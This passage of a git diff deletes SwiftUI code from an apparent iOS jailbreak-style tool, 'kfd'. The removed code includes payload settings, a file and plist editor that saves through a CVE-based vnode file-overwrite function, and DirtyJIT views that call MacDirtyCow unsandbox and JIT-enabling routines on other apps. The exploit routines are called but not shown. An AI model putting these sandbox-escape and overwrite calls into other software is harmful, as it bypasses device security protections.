.accentColor(.green) - .popover(isPresented: $isSettingsPopoverPresented, arrowEdge: .bottom) { - settingsPopover - } - .popover(isPresented: $isTweaksPopoverPresented, arrowEdge: .bottom) { - tweakSettings - } - .popover(isPresented: $isJITPopoverPresented, arrowEdge: .bottom) { - DirtyJITView() - } - .popover(isPresented: $isFilePopoverPresented, arrowEdge: .bottom) { - FileManagerUIKitViewControllerWrapper() - } - .popover(isPresented: $isSwiftFilePopoverPresented, arrowEdge: .bottom) { - FileManagerView() - } - } - } - - // Payload Settings Popover - private var settingsPopover: some View { - VStack { - Section(header: Text("Payload Settings")) { - Picker("puaf pages:", selection: $puafPages) { - ForEach(puafPagesOptions, id: \.self) { pages in - Text(String(pages)) - } - }.pickerStyle(SegmentedPickerStyle()) - .disabled(kfd != 0) - - Picker("puaf method:", selection: $puafMethod) { - ForEach(0.. [String] { - var enabledTweaks: [String] = [] - if enableHideHomebar { - enabledTweaks.append("enableHideHomebar") - } - if enableHideDock { - enabledTweaks.append("HideDock") - } - if enableCustomFont { - enabledTweaks.append("enableCustomFont") - } - if enableReplacecert { - enabledTweaks.append("enableReplacecert") - } - if changeRegion { - enabledTweaks.append("changeRegion") - } - if whitelist { - enabledTweaks.append("whitelist") - } - if supervise { - enabledTweaks.append("supervise") - } - - return enabledTweaks } } @@ -373,112 +83,3 @@ struct ContentView_Previews: PreviewProvider { ContentView() } } - -struct FileManagerUIKitViewControllerWrapper: UIViewControllerRepresentable { - typealias UIViewControllerType = ViewController - - func makeUIViewController(context: Context) -> ViewController { - return ViewController() - } - - func updateUIViewController(_ uiViewController: ViewController, context: Context) { - } -} - -struct MaterialView: UIViewRepresentable { - let material: UIBlurEffect.Style - - init(_ material: UIBlurEffect.Style) { - self.material = material - } - - func makeUIView(context: Context) -> UIVisualEffectView { - UIVisualEffectView(effect: UIBlurEffect(style: material)) - } - - func updateUIView(_ uiView: UIVisualEffectView, context: Context) { - uiView.effect = UIBlurEffect(style: material) - } -} - - -/* -struct AXFileViewControllerUIKitViewControllerWrapper: UIViewControllerRepresentable { - typealias UIViewControllerType = UITableViewController - - func makeUIViewController(context: Context) -> UITableViewController { - return AXFileViewController() - } - - func updateUIViewController(_ uiViewController: UITableViewController, context: Context) { - } -} - -struct withbarview: View { - @State private var selectedview: String = "kfd" - - var targetview: some View { - ZStack{ - switch selectedview { - case "kfd": - ContentView() - case "jit": - DirtyJITView() - case "file": - FileManagerUIKitViewControllerWrapper() - default: - ContentView() - } - } - } - - var body: some View { - ZStack{ - targetview - }.toolbar { - ToolbarItem(placement: .bottomBar) { - Spacer() - } - ToolbarItem(placement: .bottomBar) { - Image(systemName: "snowflake") - .resizable() - .scaledToFit() - .frame(width: 32, height: 32) - .onTapGesture{ - selectedview = "kfd" - print(selectedview) - } - } - ToolbarItem(placement: .bottomBar) { - Spacer() - } - ToolbarItem(placement: .bottomBar) { - Image(systemName: "app.connected.to.app.below.fill") - .resizable() - .scaledToFit() - .frame(width: 32, height: 32) - .onTapGesture{ - selectedview = "jit" - print(selectedview) - } - } - ToolbarItem(placement: .bottomBar) { - Spacer() - } - ToolbarItem(placement: .bottomBar) { - Image(systemName: "pc") - .resizable() - .scaledToFit() - .frame(width: 32, height: 32) - .onTapGesture{ - selectedview = "file" - print(selectedview) - } - } - ToolbarItem(placement: .bottomBar) { - Spacer() - } - } - } -} -*/ diff --git a/kfd/FileManager.swift b/kfd/FileManager.swift deleted file mode 100644 index e878df5a..00000000 --- a/kfd/FileManager.swift +++ /dev/null @@ -1,538 +0,0 @@ -// -// ContentView.swift -// files -// -// Created by Mineek on 28/12/2022. -// - -import SwiftUI -import UIKit - -// A elegant file manager for CVE-2022-446689 - -// Structs -struct File: Identifiable { - var id = UUID() - var name: String - var type: String - var size: String - var date: String -} - -struct Folder: Identifiable { - var id = UUID() - var name: String - var contents: [File] -} - -// the main magic: the CVE -// based on: https://github.com/zhuowei/WDBFontOverwrite/blob/main/WDBFontOverwrite/OverwriteFontImpl.swift#L34 -func overwriteFile(fileDataLocked: Data, pathtovictim: String) -> Bool { - let path = NSHomeDirectory() + "/Documents/tmp" - let contentString = String(data: fileDataLocked, encoding: .utf8)! - do { - try contentString.write(toFile: path, atomically: true, encoding: .utf8) - print("open", path) - } catch { - print("err:", error ) - } - print(path) - print(pathtovictim) - funVnodeOverwriteForManager(pathtovictim, path) - return true -} - -func convertPath(path: URL) -> String { - return URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") -} - -func fileExists(atPath path: String) -> Bool { - return FileManager.default.fileExists(atPath: path) -} - -// FileManager ListItem - -struct ListItem: View { - var file: File - var body: some View { - HStack { - Image(systemName: "doc") - .resizable() - .frame(width: 20, height: 20) - VStack(alignment: .leading) { - Text(file.name) - .font(.headline) - Text(file.type) - .font(.subheadline) - } - Spacer() - VStack(alignment: .trailing) { - Text(file.size) - .font(.subheadline) - Text(file.date) - .font(.subheadline) - } - } - } -} - -class VnodeData: ObservableObject { - @Published var v_data: UInt64 = 0 - @Published var fortesting: UInt64 = 0 -} - -// FileManager ContentView, begin in path "/" -// make sure the filemanagers don't overlap -struct FileManagerView: View { - @State var path: String = "/" - @State var dir: String = "/" - @State var folders: [Folder] = [] - @State var files: [File] = [] - @State var empty: Bool = false - @State var orig_to_v_data: UInt64 = 0 - @State var ismounted: Bool = false - @State private var isLongPressing = false - - var body: some View { - List { - ForEach(folders, id: \.id) { folder in - NavigationLink(destination: FileManagerView(path: path + folder.name + "/", orig_to_v_data: orig_to_v_data, ismounted: ismounted)) { - HStack { - Image(systemName: "folder") - .resizable() - .frame(width: 20, height: 20) - Text(folder.name) - .font(.headline) - .contextMenu { - VStack { - Button(action: { - // ask user for direct path to FOLDER - let alert = UIAlertController(title: "mount", message: "Enter the direct path to the folder you want to mount.", preferredStyle: .alert) - alert.addTextField { (textField) in - textField.text = path + folder.name - } - alert.addAction(UIAlertAction(title: "Cancel", style: .cancel, handler: nil)) - alert.addAction(UIAlertAction(title: "Mount", style: .default, handler: { (_) in - let text = alert.textFields![0].text! - if text.last != "/" { - dir = text + "/" - } else { - dir = text - } - print(dir) - print(URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") + "Documents" + dir) - if !fileExists(atPath: URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") + "Documents" + dir) { - do { - try FileManager.default.createDirectory(atPath: URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") + "Documents" + dir, withIntermediateDirectories: false, attributes: nil) - } catch let error { - print(error.localizedDescription) - } - } - DispatchQueue.main.async { - orig_to_v_data = mountselectedDir(dir) - ismounted = true - } - print(orig_to_v_data) - })) - UIApplication.shared.windows.first?.rootViewController?.present(alert, animated: true, completion: nil) - }) { - Text("mount ...") - Image(systemName: "mount") - } - Button(action: { - print(path.replacingOccurrences(of: NSHomeDirectory() + "/Documents", with: "") + folder.name + "/" ) - print(path.replacingOccurrences(of: "file://", with: "") + folder.name + "/") - DispatchQueue.main.async { - orig_to_v_data = mountselectedDir(path.replacingOccurrences(of: NSHomeDirectory() + "/Documents", with: "") + folder.name + "/") - ismounted = true - } - print(orig_to_v_data) - }) - { - Text("mount original folder") - Image(systemName: "mount") - } - if(ismounted) { - Button(action: { - print(orig_to_v_data) - print(path.replacingOccurrences(of: "file://", with: "") + folder.name + "/") - unmountselectedDir(orig_to_v_data, path.replacingOccurrences(of: "file://", with: "") + folder.name + "/") - ismounted = false - orig_to_v_data = 0 - }) - { - Text("unmount selected folder") - Image(systemName: "mount") - } - } - } - - Button(action: { - path = URL(fileURLWithPath: NSHomeDirectory()).absoluteString.replacingOccurrences(of: "file://", with: "") - // navigate to the new path - folders = [] - files = [] - let fileManager = FileManager.default - let enumerator = fileManager.enumerator(atPath: path) - while let element = enumerator?.nextObject() as? String { - // only do the top level files and folders - if element.contains("/") { - continue - } - let attrs = try! fileManager.attributesOfItem(atPath: path + element) - let type = attrs[.type] as! FileAttributeType - if type == .typeDirectory { - folders.append(Folder(name: element, contents: [])) - } else if type == .typeRegular { - let size = attrs[.size] as! UInt64 - let date = attrs[.modificationDate] as! Date - let dateFormatter = DateFormatter() - dateFormatter.dateFormat = "MMM dd, yyyy" - let dateString = dateFormatter.string(from: date) - let sizeString = ByteCountFormatter.string(fromByteCount: Int64(size), countStyle: .file) - let fileExtension = element.split(separator: ".").last! - files.append(File(name: element, type: "\(fileExtension)", size: sizeString, date: dateString)) - } - } - if folders.count == 0 && files.count == 0 { - empty = true - } else { - empty = false - } - }) - { - Text("go to home") - Image(systemName: "house") - } - } - } - } - } - ForEach(files, id: \.id) { file in - Button(action: { - // if the file is a plist, open the plist editor - if file.type == "plist" || file.type == "strings" { - let fileManager = FileManager.default - let data = fileManager.contents(atPath: path + file.name) - let plist = try! PropertyListSerialization.propertyList(from: data!, options: [], format: nil) as! [String: Any] - let keys = plist.keys.sorted() - var values: [String] = [] - var types: [String] = [] - for key in keys { - let value = plist[key]! - values.append("\(value)") - types.append("\(type(of: value))") - } - let vc = UIHostingController(rootView: PlistEditorView(path: path + file.name, plist: plist, keys: keys, values: values, types: types)) - UIApplication.shared.windows.first?.rootViewController?.present(vc, animated: true, completion: nil) - } else { - // use TextEditor to edit the file - let vc = UIHostingController(rootView: TextEditorView(path: path + file.name)) - UIApplication.shared.windows.first?.rootViewController?.present(vc, animated: true, completion: nil) - } - }) { - ListItem(file: file) - } - } - if empty { - Text("Awww, sandbox has blocked us from viewing this folder :(") - Text("If you know the direct path, please enter it here.") - Button(action: { - // ask user for direct path to FOLDER - let alert = UIAlertController(title: "Enter Direct Path", message: "Enter the direct path to the folder you want to access.", preferredStyle: .alert) - alert.addTextField { (textField) in - textField.text = path - } - alert.addAction(UIAlertAction(title: "Cancel", style: .cancel, handler: nil)) - alert.addAction(UIAlertAction(title: "Enter", style: .default, handler: { (_) in - let text = alert.textFields![0].text! - if text.last != "/" { - path = text + "/" - } else { - path = text - } - // navigate to the new path - folders = [] - files = [] - let fileManager = FileManager.default - let enumerator = fileManager.enumerator(atPath: path) - while let element = enumerator?.nextObject() as? String { - // only do the top level files and folders - if element.contains("/") { - continue - } - let attrs = try! fileManager.attributesOfItem(atPath: path + element) - let type = attrs[.type] as! FileAttributeType - if type == .typeDirectory { - folders.append(Folder(name: element, contents: [])) - } else if type == .typeRegular { - let size = attrs[.size] as! UInt64 - let date = attrs[.modificationDate] as! Date - let dateFormatter = DateFormatter() - dateFormatter.dateFormat = "MMM dd, yyyy" - let dateString = dateFormatter.string(from: date) - let sizeString = ByteCountFormatter.string(fromByteCount: Int64(size), countStyle: .file) - let fileExtension = element.split(separator: ".").last! - files.append(File(name: element, type: "\(fileExtension)", size: sizeString, date: dateString)) - } - } - if folders.count == 0 && files.count == 0 { - empty = true - } else { - empty = false - } - })) - UIApplication.shared.windows.first?.rootViewController?.present(alert, animated: true, completion: nil) - }) { - Text("Enter Direct Path") - } - } - } - .navigationTitle(path) - .onAppear(perform: { - // clear the arrays - folders = [] - files = [] - let fileManager = FileManager.default - let enumerator = fileManager.enumerator(atPath: path) - while let element = enumerator?.nextObject() as? String { - // only do the top level files and folders - if element.contains("/") { - continue - } - let attrs = try! fileManager.attributesOfItem(atPath: path + element) - let type = attrs[.type] as! FileAttributeType - if type == .typeDirectory { - folders.append(Folder(name: element, contents: [])) - } else if type == .typeRegular { - let size = attrs[.size] as! UInt64 - let date = attrs[.modificationDate] as! Date - let formatter = DateFormatter() - formatter.dateStyle = .short - formatter.timeStyle = .short - let dateString = formatter.string(from: date) - var sizeString = "" - if size < 1024 { - sizeString = "\(size) B" - } else if size < 1024 * 1024 { - sizeString = "\(size / 1024) KB" - } else if size < 1024 * 1024 * 1024 { - sizeString = "\(size / 1024 / 1024) MB" - } else { - sizeString = "\(size / 1024 / 1024 / 1024) GB" - } - files.append(File(name: element, type: element.components(separatedBy: ".").last!, size: sizeString, date: dateString)) - } - } - // if they're empty, add a "no files" message in gray - if folders.isEmpty && files.isEmpty { - empty = true - } - }) - } -} - -// PlistEditorView -struct PlistEditorView: View { - @State var path: String - @State var plist: [String: Any] = [:] - @State var keys: [String] = [] - @State var values: [String] = [] - @State var types: [String] = [] - @State var newKey: String = "" - @State var newValue: String = "" - @State var newType: String = "String" - @State var showAdd: Bool = false - @State var showEdit: Bool = false - @State var editIndex: Int = 0 - @State var showDelete: Bool = false - @State var deleteIndex: Int = 0 - var body: some View { - VStack { - List { - ForEach(keys.indices, id: \.self) { index in - HStack { - // check if they're in range - if index < keys.count && index < values.count && index < types.count { - Text(keys[index]) - .font(.headline) - Spacer() - Text(values[index]) - .font(.subheadline) - Text(types[index]) - .font(.subheadline) - } - } - .onTapGesture { - showEdit = true - editIndex = index - } - .contextMenu { - Button(action: { - showEdit = true - editIndex = index - }) { - Text("Edit") - } - Button(action: { - showDelete = true - deleteIndex = index - }) { - Text("Delete") - } - } - } - } - .sheet(isPresented: $showAdd) { - VStack { - Text("Add Key") - .font(.title) - TextField("Key", text: $newKey) - .textFieldStyle(RoundedBorderTextFieldStyle()) - TextField("Value", text: $newValue) - .textFieldStyle(RoundedBorderTextFieldStyle()) - Picker("Type", selection: $newType) { - Text("String").tag("String") - Text("Integer").tag("Integer") - Text("Boolean").tag("Boolean") - Text("Float").tag("Float") - Text("Double").tag("Double") - } - .pickerStyle(SegmentedPickerStyle()) - Button(action: { - if newKey != "" && newValue != "" { - keys.append(newKey) - values.append(newValue) - types.append(newType) - newKey = "" - newValue = "" - newType = "String" - showAdd = false - } - }) { - Text("Add") - } - } - .padding() - } - .sheet(isPresented: $showEdit) { - VStack { - Text("Edit Key") - .font(.title) - TextField("Key", text: $keys[editIndex]) - .textFieldStyle(RoundedBorderTextFieldStyle()) - TextField("Value", text: $values[editIndex]) - .textFieldStyle(RoundedBorderTextFieldStyle()) - Picker("Type", selection: $types[editIndex]) { - Text("String").tag("String") - Text("Integer").tag("Integer") - Text("Boolean").tag("Boolean") - Text("Float").tag("Float") - Text("Double").tag("Double") - } - .pickerStyle(SegmentedPickerStyle()) - Button(action: { - showEdit = false - }) { - Text("Done") - } - } - .padding() - } - .alert(isPresented: $showDelete) { - Alert(title: Text("Delete Key"), message: Text("Are you sure you want to delete the key \(keys[deleteIndex])?"), primaryButton: .destructive(Text("Delete")) { - keys.remove(at: deleteIndex) - values.remove(at: deleteIndex) - types.remove(at: deleteIndex) - showDelete = false - }, secondaryButton: .cancel()) - } - HStack { - Button(action: { - showAdd = true - }) { - Text("Add") - } - Spacer() - Button(action: { - // save the plist - for index in keys.indices { - if types[index] == "String" { - plist[keys[index]] = values[index] - } else if types[index] == "Integer" { - plist[keys[index]] = Int(values[index]) - } else if types[index] == "Boolean" { - plist[keys[index]] = Bool(values[index]) - } else if types[index] == "Float" { - plist[keys[index]] = Float(values[index]) - } else if types[index] == "Double" { - plist[keys[index]] = Double(values[index]) - } - } - let data = try! PropertyListSerialization.data(fromPropertyList: plist, format: .xml, options: 0) - // use the CVE to write the file - overwriteFile(fileDataLocked: data, pathtovictim: path) - }) { - Text("Save") - } - } - } - .onAppear { - let data = try! Data(contentsOf: URL(fileURLWithPath: path)) - plist = try! PropertyListSerialization.propertyList(from: data, options: [], format: nil) as! [String: Any] - for (key, value) in plist { - keys.append(key) - if value is String { - values.append(value as! String) - types.append("String") - } else if value is Int { - values.append(String(value as! Int)) - types.append("Integer") - } else if value is Bool { - values.append(String(value as! Bool)) - types.append("Boolean") - } else if value is Float { - values.append(String(value as! Float)) - types.append("Float") - } else if value is Double { - values.append(String(value as! Double)) - types.append("Double") - } - } - } - } -} - -// TextEditorView, a view that allows the user to edit a file if it isn't a plist -struct TextEditorView: View { - @State var path: String - @State var text: String = "" - var body: some View { - VStack { - TextEditor(text: $text) - .padding() - HStack { - Spacer() - Button(action: { - // save the file - let data = text.data(using: .utf8)! - // use the CVE to write the file - overwriteFile(fileDataLocked: data, pathtovictim: path) - }) { - Text("Save") - } - } - } - .onAppear { - do { - text = try String(contentsOf: URL(fileURLWithPath: path), encoding: .utf8) - } catch { - let alert = UIAlertController(title: "Error", message: "The file could not be opened.", preferredStyle: .alert) - alert.addAction(UIAlertAction(title: "OK", style: .default, handler: nil)) - UIApplication.shared.windows.first?.rootViewController?.dismiss(animated: true, completion: { - UIApplication.shared.windows.first?.rootViewController?.present(alert, animated: true, completion: nil) - }) - } - } - } -} diff --git a/kfd/JIT/ApplicationManager.swift b/kfd/JIT/ApplicationManager.swift deleted file mode 100644 index 05b5300c..00000000 --- a/kfd/JIT/ApplicationManager.swift +++ /dev/null @@ -1,104 +0,0 @@ -// -// ApplicationManager.swift -// Cache -// -// Created by Hariz Shirazi on 2023-03-03. -// - -import Foundation -import UIKit - -// does nothing lololo -enum GenericError: Error { - case runtimeError(String) -} - -// stolen from appabetical :trolley: -class ApplicationManager2 { - private static var fm = FileManager.default - static var shared = ApplicationManager2() - - private static let userApplicationsUrl = URL(fileURLWithPath: "/var/containers/Bundle/Application", isDirectory: true) - - static func getApps() throws -> [SBApp2] { - var dotAppDirs: [URL] = [] - - let userAppsDir = try fm.contentsOfDirectory(at: userApplicationsUrl, includingPropertiesForKeys: nil) - - for userAppFolder in userAppsDir { - let userAppFolderContents = try fm.contentsOfDirectory(at: userAppFolder, includingPropertiesForKeys: nil) - if let dotApp = userAppFolderContents.first(where: { $0.absoluteString.hasSuffix(".app/") }) { - dotAppDirs.append(dotApp) - } - } - - var apps2: [SBApp2] = [] - - for bundleUrl in dotAppDirs { - let infoPlistUrl = bundleUrl.appendingPathComponent("Info.plist") - if !fm.fileExists(atPath: infoPlistUrl.path) { - // some system apps don't have it, just ignore it and move on. - continue - } - - guard let infoPlist = NSDictionary(contentsOf: infoPlistUrl) as? [String:AnyObject] else { UIApplication.shared.alert(title: "Error", body: "Error opening info.plist for \(bundleUrl.absoluteString)"); throw GenericError.runtimeError("Error opening info.plist for \(bundleUrl.absoluteString)") } - guard let CFBundleIdentifier = infoPlist["CFBundleIdentifier"] as? String else { UIApplication.shared.alert(title: "Error", body: "App \(bundleUrl.absoluteString) doesn't have bundleid"); throw GenericError.runtimeError("App \(bundleUrl.absoluteString) doesn't have bundleid")} - - var app2 = SBApp2(bundleIdentifier: CFBundleIdentifier, name: "Unknown", bundleURL: bundleUrl, pngIconPaths: [], hiddenFromSpringboard: false) - - if infoPlist.keys.contains("CFBundleDisplayName") { - guard let CFBundleDisplayName = infoPlist["CFBundleDisplayName"] as? String else { UIApplication.shared.alert(title: "Error", body: "Error reading display name for \(bundleUrl.absoluteString)"); throw GenericError.runtimeError("Error reading display name for \(bundleUrl.absoluteString)") } - app2.name = CFBundleDisplayName - } else if infoPlist.keys.contains("CFBundleName") { - guard let CFBundleName = infoPlist["CFBundleName"] as? String else { UIApplication.shared.alert(title: "Error", body: "Error reading name for \(bundleUrl.absoluteString)");throw GenericError.runtimeError("Error reading name for \(bundleUrl.absoluteString)")} - app2.name = CFBundleName - } - - // obtaining png icons inside bundle. defined in info.plist - if app2.bundleIdentifier == "com.apple.mobiletimer" { - // use correct paths for clock, because it has arrows - app2.pngIconPaths += ["circle_borderless@2x~iphone.png"] - } - if let CFBundleIcons = infoPlist["CFBundleIcons"] { - if let CFBundlePrimaryIcon = CFBundleIcons["CFBundlePrimaryIcon"] as? [String : AnyObject] { - if let CFBundleIconFiles = CFBundlePrimaryIcon["CFBundleIconFiles"] as? [String] { - app2.pngIconPaths += CFBundleIconFiles.map { $0 + "@2x.png"} - } - } - } - if infoPlist.keys.contains("CFBundleIconFile") { - // happens in the case of pseudo-installed apps - if let CFBundleIconFile = infoPlist["CFBundleIconFile"] as? String { - app2.pngIconPaths.append(CFBundleIconFile + ".png") - } - } - if infoPlist.keys.contains("CFBundleIconFiles") { - // only seen this happen in the case of Wallet - if let CFBundleIconFiles = infoPlist["CFBundleIconFiles"] as? [String], !CFBundleIconFiles.isEmpty { - app2.pngIconPaths += CFBundleIconFiles.map { $0 + ".png" } - } - } - - - apps2.append(app2) - } - - return apps2 - } - - func openApp(_ BundleID: String) { - guard let obj = objc_getClass("LSApplicationWorkspace") as? NSObject else { return } - let workspace = obj.perform(Selector(("defaultWorkspace")))?.takeUnretainedValue() as? NSObject - workspace?.perform(Selector(("openApplicationWithBundleID:")), with: BundleID) - } -} - -struct SBApp2: Identifiable, Equatable { - var id = UUID() - var bundleIdentifier: String - var name: String - var bundleURL: URL - - var pngIconPaths: [String] - var hiddenFromSpringboard: Bool -} diff --git a/kfd/JIT/DirtyJIT/Alert++.swift b/kfd/JIT/DirtyJIT/Alert++.swift deleted file mode 100644 index f20e60e3..00000000 --- a/kfd/JIT/DirtyJIT/Alert++.swift +++ /dev/null @@ -1,72 +0,0 @@ -// -// Alert++.swift -// Cowabunga -// -// Created by sourcelocation on 30/01/2023. -// - -import UIKit - -// credit: sourcelocation & TrollTools -var currentUIAlertController: UIAlertController? - - -fileprivate let errorString = NSLocalizedString("Error", comment: "") -fileprivate let okString = NSLocalizedString("OK", comment: "") -fileprivate let cancelString = NSLocalizedString("Cancel", comment: "") - -extension UIApplication { - - func dismissAlert(animated: Bool) { - DispatchQueue.main.async { - currentUIAlertController?.dismiss(animated: animated) - } - } - func alert(title: String = errorString, body: String, animated: Bool = true, withButton: Bool = true) { - DispatchQueue.main.async { - var body = body - - if title == errorString { - // append debug info - let device = UIDevice.current - let appVersion = Bundle.main.infoDictionary?["CFBundleShortVersionString"] as? String ?? "" - let appBuild = Bundle.main.infoDictionary?["CFBundleVersion"] as? String ?? "" - let systemVersion = device.systemVersion - body += "\n\(device.systemName) \(systemVersion), version \(appVersion) build \(appBuild) escaped=\(FileManager.default.isReadableFile(atPath: "/var/mobile"))" - } - - currentUIAlertController = UIAlertController(title: title, message: body, preferredStyle: .alert) - if withButton { currentUIAlertController?.addAction(.init(title: okString, style: .cancel)) } - self.present(alert: currentUIAlertController!) - } - } - func confirmAlert(title: String = errorString, body: String, confirmTitle: String = okString, onOK: @escaping () -> (), noCancel: Bool) { - DispatchQueue.main.async { - currentUIAlertController = UIAlertController(title: title, message: body, preferredStyle: .alert) - if !noCancel { - currentUIAlertController?.addAction(.init(title: cancelString, style: .cancel)) - } - currentUIAlertController?.addAction(.init(title: confirmTitle, style: noCancel ? .cancel : .default, handler: { _ in - onOK() - })) - self.present(alert: currentUIAlertController!) - } - } - func change(title: String = errorString, body: String) { - DispatchQueue.main.async { - currentUIAlertController?.title = title - currentUIAlertController?.message = body - } - } - - func present(alert: UIAlertController) { - if var topController = self.windows[0].rootViewController { - while let presentedViewController = topController.presentedViewController { - topController = presentedViewController - } - - topController.present(alert, animated: true) - // topController should now be your topmost view controller - } - } -} diff --git a/kfd/JIT/DirtyJIT/AppsView.swift b/kfd/JIT/DirtyJIT/AppsView.swift deleted file mode 100644 index 12001a87..00000000 --- a/kfd/JIT/DirtyJIT/AppsView.swift +++ /dev/null @@ -1,60 +0,0 @@ -// -// AppsView.swift -// DirtyJIT -// -// Created by Анохин Юрий on 05.03.2023. -// - -import SwiftUI -import MacDirtyCow - -struct AppsView: View { - @Binding var searchText: String - let apps2: [SBApp2] - let appsManager2 = ApplicationManager2.shared - - var body: some View { - List(apps2.filter { searchText.isEmpty || $0.name.localizedCaseInsensitiveContains(searchText) }) { app2 in - HStack { - if let image = UIImage(contentsOfFile: app2.bundleURL.appendingPathComponent(app2.pngIconPaths.first ?? "").path) { - Image(uiImage: image) - .resizable() - .aspectRatio(contentMode: .fit) - .frame(width: 44, height: 44) - .cornerRadius(10) - } else { - Image("DefaultIcon") - .resizable() - .aspectRatio(contentMode: .fit) - .frame(width: 44, height: 44) - .cornerRadius(10) - } - VStack(alignment: .leading) { - Text(app2.name) - .font(.headline) - Text(app2.bundleIdentifier) - .font(.subheadline) - .foregroundColor(.secondary) - } - } - .onTapGesture { - UIApplication.shared.confirmAlert(title: "Warning", body: "We will now try to enable JIT on \(app2.name). Make sure the app is opened in the background so we can find it's PID!", onOK: { - UIApplication.shared.alert(title: "Please wait", body: "Enabling JIT...", withButton: false) - - MacDirtyCow.Swiftcallps() - - DispatchQueue.main.asyncAfter(deadline: .now() + 1) { - UIApplication.shared.dismissAlert(animated: true) - - MacDirtyCow.enableJIT(pidApp: MacDirtyCow.returnPID(exec: app2.name)) - - DispatchQueue.main.asyncAfter(deadline: .now() + 0.5) { - appsManager2.openApp(app2.bundleIdentifier) - } - } - }, noCancel: false) - } - } - .environment(\.defaultMinListRowHeight, 50) - } -} diff --git a/kfd/JIT/DirtyJIT/DirtyJITView.swift b/kfd/JIT/DirtyJIT/DirtyJITView.swift deleted file mode 100644 index 52693596..00000000 --- a/kfd/JIT/DirtyJIT/DirtyJITView.swift +++ /dev/null @@ -1,56 +0,0 @@ -// -// ContentView.swift -// DirtyJIT -// -// Created by Анохин Юрий on 03.03.2023. -// - -import SwiftUI -import MacDirtyCow - -@available(iOS 15.0, *) -struct DirtyJITView: View { - @AppStorage("firstTime") private var firstTime = true - @State var apps2: [SBApp2] = [] - @State private var searchText = "" - @State private var presentAlert = false - - var body: some View { - VStack { - AppsView(searchText: $searchText, apps2: apps2) - .navigationBarTitle("DirtyJIT", displayMode: .inline) - .toolbar { - Button { - presentAlert = true - } label: { - Image(systemName: "magnifyingglass") - } - } - } -// .sheet(isPresented: $firstTime, content: SetupView.init) - .onAppear { - UIApplication.shared.alert(title: "Loading", body: "Please wait...", withButton: false) - - func unsandboxing() { - do { - try MacDirtyCow.unsandbox() - } catch { - print(error) - } - } - unsandboxing() - DispatchQueue.main.asyncAfter(deadline: .now() + 3) { - UIApplication.shared.dismissAlert(animated: false) - - do { - apps2 = try ApplicationManager2.getApps() - } catch { - UIApplication.shared.alert(title: "Error", body: error.localizedDescription, withButton: true) - } - } - } - .textFieldAlert(isPresented: $presentAlert) { () -> TextFieldAlert in - TextFieldAlert(title: "Enter app name", message: "Search for the app you want to find, make sure you spell it right!", text: Binding($searchText)) - } - } -} diff --git a/kfd/JIT/DirtyJIT/SearchBar.swift b/kfd/JIT/DirtyJIT/SearchBar.swift deleted file mode 100644 index b69ed5cd..00000000 --- a/kfd/JIT/DirtyJIT/SearchBar.swift +++ /dev/null @@ -1,50 +0,0 @@ -// -// SearchBar.swift -// DirtyJIT -// -// Created by Анохин Юрий on 05.03.2023. -// - -import SwiftUI - -struct SearchBar: View { - @Binding var text: String - @State private var isEditing = false - - var body: some View { - HStack { - ZStack { - Rectangle() - .foregroundColor(Color(.systemGray6)) - .cornerRadius(10) - HStack(spacing: 8) { - Image(systemName: "magnifyingglass") - .foregroundColor(.secondary) - .padding(.leading, 8) - TextField("Search", text: $text, onEditingChanged: { editing in - self.isEditing = editing - }) - .foregroundColor(.primary) - .accentColor(.primary) - .background(Color(.systemGray6)) - .cornerRadius(10) - .padding(.trailing, isEditing ? 0 : 32) - .frame(height: 36) - if isEditing { - Button(action: { - self.isEditing = false - self.text = "" - UIApplication.shared.sendAction(#selector(UIResponder.resignFirstResponder), to: nil, from: nil, for: nil) - }) { - Image(systemName: "xmark.circle.fill") - .foregroundColor(.secondary) - .padding(.trailing, 8) - } - } - } - } - .frame(height: 36) - .padding(.horizontal, 10) - } - } -} diff --git a/kfd/JIT/DirtyJIT/TextField++.swift b/kfd/JIT/DirtyJIT/TextField++.swift deleted file mode 100644 index 8e2e3166..00000000 --- a/kfd/JIT/DirtyJIT/TextField++.swift +++ /dev/null @@ -1,121 +0,0 @@ -// -// TextField++.swift -// DirtyJIT -// -// Created by Анохин Юрий on 09.03.2023. -// - -import SwiftUI -import Combine - -class TextFieldAlertViewController: UIViewController { - - /// Presents a UIAlertController (alert style) with a UITextField and a `Done` button - /// - Parameters: - /// - title: to be used as title of the UIAlertController - /// - message: to be used as optional message of the UIAlertController - /// - text: binding for the text typed into the UITextField - /// - isPresented: binding to be set to false when the alert is dismissed (`Done` button tapped) - init(title: String, message: String?, text: Binding, isPresented: Binding?) { - self.alertTitle = title - self.message = message - self._text = text - self.isPresented = isPresented - super.init(nibName: nil, bundle: nil) - } - - required init?(coder: NSCoder) { - fatalError("init(coder:) has not been implemented") - } - - // MARK: - Dependencies - private let alertTitle: String - private let message: String? - @Binding private var text: String? - private var isPresented: Binding? - - // MARK: - Private Properties - private var subscription: AnyCancellable? - - // MARK: - Lifecycle - override func viewDidAppear(_ animated: Bool) { - super.viewDidAppear(animated) - presentAlertController() - } - - private func presentAlertController() { - guard subscription == nil else { return } // present only once - - let vc = UIAlertController(title: alertTitle, message: message, preferredStyle: .alert) - - // add a textField and create a subscription to update the `text` binding - vc.addTextField { [weak self] textField in - guard let self = self else { return } - self.subscription = NotificationCenter.default - .publisher(for: UITextField.textDidChangeNotification, object: textField) - .map { ($0.object as? UITextField)?.text } - .assign(to: \.text, on: self) - } - - // create a `Done` action that updates the `isPresented` binding when tapped - // this is just for Demo only but we should really inject - // an array of buttons (with their title, style and tap handler) - let action = UIAlertAction(title: "Done", style: .default) { [weak self] _ in - self?.isPresented?.wrappedValue = false - } - vc.addAction(action) - present(vc, animated: true, completion: nil) - } -} - -struct TextFieldAlert { - - // MARK: Properties - let title: String - let message: String? - @Binding var text: String? - var isPresented: Binding? = nil - - // MARK: Modifiers - func dismissable(_ isPresented: Binding) -> TextFieldAlert { - TextFieldAlert(title: title, message: message, text: $text, isPresented: isPresented) - } -} - -extension TextFieldAlert: UIViewControllerRepresentable { - - typealias UIViewControllerType = TextFieldAlertViewController - - func makeUIViewController(context: UIViewControllerRepresentableContext) -> UIViewControllerType { - TextFieldAlertViewController(title: title, message: message, text: $text, isPresented: isPresented) - } - - func updateUIViewController(_ uiViewController: UIViewControllerType, - context: UIViewControllerRepresentableContext) { - // no update needed - } 